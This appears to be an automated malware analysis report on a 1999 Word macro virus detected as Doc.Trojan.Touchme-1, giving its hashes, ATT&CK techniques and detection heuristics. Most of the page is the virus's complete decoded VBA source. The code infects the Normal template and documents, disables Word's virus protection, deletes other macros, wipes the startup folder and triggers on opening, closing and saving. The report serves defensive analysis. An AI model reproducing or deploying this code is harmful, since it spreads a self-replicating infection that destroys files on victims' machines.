Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 335de90739231459…

MALICIOUS

Office (OLE)

42.5 KB Created: 1997-07-07 09:37:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cf326df2b0314157b92a7cc4425fb740 SHA-1: 6f3a9e07338f5a5c0b391ba938118aca0f3e6571 SHA-256: 335de90739231459ca904dcce2f816e7947d8b23dd4c4dd0a7d0fd9b27f58924
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature 'Doc.Trojan.Touchme-1'. It contains VBA macros, including a 'Document_Open' macro, which is a common technique for initial execution. The macro attempts to infect the current document and the Normal template, and disables security features, indicating a malicious intent to spread or establish persistence.

Heuristics 3

  • ClamAV: Doc.Trojan.Touchme-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Touchme-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3873 bytes
SHA-256: 86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9
Detection
ClamAV: Doc.Trojan.Touchme-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This code written by Reza Pc 212
' Copyright (C) 1999 ReYoKh Team Labs
' University of Gunadarma
'
' for all virii maker 'n the stupid jerk
'
' Last Up-Date 3 November 1999 [19.00:00]

Private Sub Infected()
    On Error Resume Next
    ID = "'tHe FuCkIng aV if TOuCh mE"
    Dim ADSave, NTSave, ADInfect, NTInfect As Boolean
    Dim Listing, Active, Ultah, Name As String
    Dim AD, NT As Object
    
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    If AD.Lines(99, 1) = ID Then ADInfect = True
    If NT.Lines(99, 1) = ID Then NTInfect = True
            
    ActiveDocument.Protect -1
    ActiveDocument.Password = ""
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    WordBasic.DisableAutoMacros True
    Application.Caption = "Mikrosof Werd"
    
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    
    If NTInfect = False Then
        NTSave = NormalTemplate.Saved
        Listing = AD.Lines(1, AD.CountOfLines)
        NT.DeleteLines 1, NT.CountOfLines
        NT.AddFromString Listing
        If NTSave = True Then NormalTemplate.Save
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
    End If
    
    ADSave = ActiveDocument.Saved
    Listing = NT.Lines(1, NT.CountOfLines)
    AD.DeleteLines 1, AD.CountOfLines
    AD.AddFromString Listing
    If ADSave = True Then ActiveDocument.Save
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
    Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
        
    If Day(Date) = 1 Then Name = ID
    If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
    If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
    If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
    If Name <> "" And Name <> ID Then
        Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _
                ", I hope you always Happy"
        Active = Assistant.Visible
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _
                    "Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah
            .Show
        End With
        Assistant.Visible = Active
    End If
    Kill Application.StartupPath + "\*.*"
    Options.VirusProtection = True
    WordBasic.DisableAutoMacros False
End Sub
Private Sub Document_Close()
    Infected
End Sub
Private Sub Document_Open()
    Infected
End Sub
Private Sub Document_Save()
    Infected
End Sub
Private Sub Document_New()
    Infected
End Sub
Private Sub Document_Exit()
    Infected
End Sub
Private Sub Document_Exec()
    Infected
End Sub
'tHe FuCkIng aV if TOuCh mE